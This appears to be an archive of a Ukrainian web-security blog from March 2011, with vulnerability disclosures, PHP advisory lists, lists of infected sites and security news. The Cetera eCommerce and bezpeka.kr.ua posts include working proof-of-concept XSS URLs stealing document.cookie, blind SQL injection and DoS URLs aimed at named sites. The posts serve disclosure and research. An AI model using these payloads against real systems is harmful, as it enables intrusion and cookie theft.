Уразливість в MaxSite Anti Spam Image

23:53 29.03.2011

В проекті MoBiC я вже писав про уразливість в капчі Anti Spam Image. І 01.12.2007 я знайшов Insufficient Anti-automation уразливість в плагіні MaxSite Anti Spam Image для WordPress. Це перероблена версія оригінального Anti Spam Image (розробник вирішив ускладнити капчу, для кращого захисту від спамерів). Про що в той же день я повідомив розробнику плагіна.

Insufficient Anti-automation:

Даний капча плагін для WP вразливий до методу обходу session reusing with constant captcha (який описаний у вищенаведеному записі). Як і оригінальний Anti Spam Image, на основі якого і зроблений даний плагін.

MaxSite Anti Spam Image CAPTCHA bypass.html

Уразливість має місце на старих версіях PHP. Вона проявляється лише в PHP < 4.4.7, в яких є баг, який призводить до помилки в роботі алгоритму веб додатку, що призводить до можливості обходу капчі.

Уразливі MaxSite Anti Spam Image 0.6 та потенційно всі інші версії цього плагіна.

Інфіковані сайти №72

22:43 29.03.2011

Після попереднього дослідження інфікованих сайтів, приведу нову інформацію про заражені сайти. З числа українських сайтів.

  • http://vis-games.com - інфекція була виявлена 08.03.2011. Зараз сайт не входить до переліку підозрілих.
  • http://strawbale.ho.ua - інфекція була виявлена 25.03.2011. Зараз сайт входить до переліку підозрілих.
  • http://probux.ho.ua - інфекція була виявлена 10.01.2011. Зараз сайт не входить до переліку підозрілих.
  • http://programms.ho.ua - інфекція була виявлена 14.03.2011. Зараз сайт входить до переліку підозрілих.
  • http://work.ho.ua - інфекція була виявлена 10.01.2011. Зараз сайт не входить до переліку підозрілих.

Місяць безпеки PHP (продовження)

19:12 29.03.2011

Раніше я вже писав про попередні уразливості в PHP та PHP-додатках, оприлюднених в проекті Місяць безпеки PHP. А зараз я наведу останні 21 уразливість, що були оприлюднені торік в Month of PHP Security.

  • MOPS-2010-041: PHP strip_tags() Interruption Information Leak Vulnerability
  • MOPS-2010-042: PHP setcookie() Interruption Information Leak Vulnerability
  • MOPS-2010-043: PHP strtok() Interruption Information Leak Vulnerability
  • MOPS-2010-044: PHP wordwrap() Interruption Information Leak Vulnerability
  • MOPS-2010-045: PHP str_word_count() Interruption Information Leak Vulnerability
  • MOPS-2010-046: PHP str_pad() Interruption Information Leak Vulnerability
  • MOPS-2010-047: PHP trim()/ltrim()/rtrim() Interruption Information Leak Vulnerability
  • MOPS-2010-048: PHP substr_replace() Interruption Information Leak Vulnerability
  • MOPS-2010-049: PHP parse_str() Interruption Memory Corruption Vulnerability
  • MOPS-2010-050: PHP preg_match() Interruption Information Leak Vulnerability
  • MOPS-2010-051: PHP unpack() Interruption Information Leak Vulnerability
  • MOPS-2010-052: PHP pack() Interruption Information Leak Vulnerability
  • MOPS-2010-053: PHP ZEND_FETCH_RW Opcode Interruption Information Leak Vulnerability
  • MOPS-2010-054: PHP ZEND_CONCAT/ZEND_ASSIGN_CONCAT Opcode Interruption Information Leak and Memory Corruption Vulnerability
  • MOPS-2010-055: PHP ArrayObject::uasort() Interruption Memory Corruption Vulnerability
  • MOPS-2010-056: PHP php_mysqlnd_ok_read() Information Leak Vulnerability
  • MOPS-2010-057: PHP php_mysqlnd_rset_header_read() Buffer Overflow Vulnerability
  • MOPS-2010-058: PHP php_mysqlnd_read_error_from_line() Buffer Overflow Vulnerability
  • MOPS-2010-059: PHP php_mysqlnd_auth_write() Stack Buffer Overflow Vulnerability
  • MOPS-2010-060: PHP Session Serializer Session Data Injection Vulnerability
  • MOPS-2010-061: PHP SplObjectStorage Deserialization Use-After-Free Vulnerability

Добірка уразливостей

15:24 29.03.2011

В даній добірці уразливості в веб додатках:

  • HP-UX Running rpc.ttdbserver, Remote Execution of Arbitrary Code (деталі)
  • HP Insight Control for Linux, Remote Execution of Arbitrary Code, Remote Denial of Service (DoS), Remote Unauthorized Access (деталі)
  • SQL injection in SweetRice CMS (деталі)
  • XSS in SweetRice CMS (деталі)
  • HP Insight Software Installer for Windows, Local Unauthorized Access to Data, Remote Cross Site Request Forgery (CSRF) (деталі)
  • Reset admin password in SweetRice CMS (деталі)
  • Shell create & command execution in JAF CMS (деталі)
  • RSA, The Security Division of EMC, informs about potential security vulnerability in RSA enVision versions prior to 3.7 SP1 (деталі)
  • RFI in JAF CMS (деталі)
  • BBcode XSS in MiniBB (деталі)

Уразливості в плагінах для WordPress №41

23:51 28.03.2011

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Sodahead Polls, Smen Social Button та Rating-Widget. Для котрих з’явилися експлоіти. Sodahead Polls - це плагін для стоворення голосувань, Smen Social Button - це плагін для голосування на сайті smen.ro, Rating-Widget - це доповнення до плагіна Comment Rating.

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Місяць безпеки PHP (продовження)

22:49 28.03.2011

Торік я писав про проект Місяць безпеки PHP. В попередньому записі я навів перші двадцять уразливостей в PHP та PHP-додатках, оприлюднених в даному проекті. А зараз я наведу нові 20 уразливостей, що були оприлюднені торік в Month of PHP Security.

  • MOPS-2010-021: PHP fnmatch() Stack Exhaustion Vulnerability
  • MOPS-2010-022: PHP Stream Context Use After Free on Request Shutdown Vulnerability
  • MOPS-2010-023: Cacti Graph Viewer SQL Injection Vulnerability
  • MOPS-2010-024: PHP phar_stream_flush Format String Vulnerability
  • MOPS-2010-025: PHP phar_wrapper_open_dir Format String Vulnerability
  • MOPS-2010-026: PHP phar_wrapper_unlink Format String Vulnerability
  • MOPS-2010-027: PHP phar_parse_url Format String Vulnerabilities
  • MOPS-2010-028: PHP phar_wrapper_open_url Format String Vulnerabilities
  • MOPS-2010-029: CMSQlite c Parameter SQL Injection Vulnerability
  • MOPS-2010-030: CMSQlite mod Parameter Local File Inclusion Vulnerability
  • MOPS-2010-031: e107 Usersettings loginname SQL Injection Vulnerability
  • MOPS-2010-032: PHP iconv_mime_decode() Interruption Information Leak Vulnerability
  • MOPS-2010-033: PHP iconv_substr() Interruption Information Leak Vulnerability
  • MOPS-2010-034: PHP iconv_mime_encode() Interruption Information Leak Vulnerability
  • MOPS-2010-035: e107 BBCode Remote PHP Code Execution Vulnerability
  • MOPS-2010-036: PHP htmlentities() and htmlspecialchars() Interruption Information Leak Vulnerability
  • MOPS-2010-037: PHP str_getcsv() Interruption Information Leak Vulnerability
  • MOPS-2010-038: PHP http_build_query() Interruption Information Leak Vulnerability
  • MOPS-2010-039: PHP strpbrk() Interruption Information Leak Vulnerability
  • MOPS-2010-040: PHP strtr() Interruption Information Leak Vulnerability

Підвищення привілеїв у модулі mpm_itk для Apache

19:08 28.03.2011

Виявлена можливість підвищення привілеїв у модулі mpm_itk для веб сервера Apache.

Уразливі продукти: mpm-itk 2.2.

При певному сполученні умов запит обробляється з підвищеними привілеями.

Уразливості на bezpeka.kr.ua

15:20 28.03.2011

07.09.2010

У квітні, 18.04.2010, я знайшов Insufficient Anti-automation, Cross-Site Scripting, Denial of Service та Full path disclosure уразливості на сайті http://bezpeka.kr.ua (це онлайн магазин, що продає секюріті товари). Про що найближчим часом сповіщу адміністрацію сайта.

Стосовно дірок на сайтах онлайн магазинів в останнє я писав про уразливості на citycom.ua.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

28.03.2011

Insufficient Anti-automation:

http://bezpeka.kr.ua/users/register.html

На даній сторінці використовується уразлива капча. Приклад атаки показаний в експлоіті для PHPShop:

PHPShop CAPTCHA bypass.html

http://bezpeka.kr.ua/users/sendpassword.html

На даній сторінці немає захисту від автоматизованих запитів (капчі).

XSS:

POST запит на сторінці http://bezpeka.kr.ua/users/register.html з обходом капчі. Приклад атаки показаний в експлоіті для PHPShop:

PHPShop XSS.html

DoS:

http://bezpeka.kr.ua/search/?words=.&p=all&cat=0

Full path disclosure:

http://bezpeka.kr.ua/page/’

Дані уразливості, окрім FPD, досі не виправлені.

Новини: взлом wiki.php.net, атака на RSA та стандартизація пентесту

22:47 26.03.2011

За повідомленням hackzona.com.ua, невідомі хакери скомпрометували wiki.php.net.

The PHP Group вчора повідомила про успішну атаку на сервер wiki.php.net. У результаті злому, зловмисники зуміли отримати root доступ до сервера і зібрати інформацію про облікові записи користувачів. Отримані дані могли бути використані для внесення змін у вихідні коди PHP.

За повідомленням www.xakep.ru, взлом і крадіжка даних RSA: система ідентифікації SecurID під загрозою.

За офіційною інформацією RSA, яку компанія оприлюднила в цьому місяці, на них була успішно проведена атака. При тому, що дана секюріті компанія весь час себе позиціонує дуже захищеною.

Хакери одержали доступ до серверів RSA і викрали інформацію, що може бути використана для підриву безпеки двухфакторної системи авторизації, використовуваної більш ніж 40 мільйонами співробітників для доступу до важливих корпоративних і урядових мереж.

За повідомленням www.xakep.ru, білі хакери стандартизують пентест.

Дослідники, що перевіряють системи захисту, об’єдналися, щоб створити звід правил з метою підвищити якість роботи хакерів, що трудяться на договірній основі.

Пентестери з усього світу спільно розробляють Стандарт виконання тестів на проникнення (Penetration Testing Execution Standard - PTES), щоб надати клієнтам еталон, що визначить якість іспитів, здійснюваних дослідниками.

Нові уразливості в Cetera eCommerce

19:21 26.03.2011

28.01.2011

У грудні, 14.12.2010, я знайшов нові Cross-Site Scripting, SQL Injection та SQL DB Structure Extraction уразливості в системі Cetera eCommerce (онлайн магазин). Які виявив на демо сайті розробників системи http://ecommerce-demo.cetera.ru (на перші дві XSS звернув мою увагу Maciej Gojny). Причому деякі уразливості стосуються як 14 версії, так і 15 версії Cetera eCommerce, що вийшла у жовтні 2010 року (і яка зараз розміщена на демо сайті).

Раніше я вже писав про уразливості в Cetera eCommerce.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам системи.

26.03.2011

XSS (також працюють в версії 15.0):

http://site/catalog/%3Cscript%3Ealert(document.cookie)%3C/script%3E/
http://site/vendors/%3Cscript%3Ealert(document.cookie)%3C/script%3E/
http://site/catalog/cart/%3Cscript%3Ealert(document.cookie)%3C/script%3E/
http://site/news/%3Cscript%3Ealert(document.cookie)%3C/script%3E/
http://site/news/13012011111030/%3Cscript%3Ealert(document.cookie)%3C/script%3E/

XSS:

http://site/%3Cscript%3Ealert(document.cookie)%3C/script%3E/

Дана уразливість з’явилася в версії 15.0. Уразливість має місце на сторінці з 404 помилкою, тому вона спрацює як за цією адресою, так і за іншими адресами, що ведуть на неіснуючі сторінки.

SQL Injection (blind SQLi):

http://site/catalog/(version()=5.1)/

http://site/catalog/cart/’+benchmark(100000,md5(now()))+’/

SQL DB Structure Extraction:

http://site/catalog/%22/

http://site/catalog/cart/’/

Уразливі Cetera eCommerce 14.0 та попередні версії, а XSS уразливості також стосуються версії 15.0. Останні чотири уразливості вже виправлені в останній версії системи.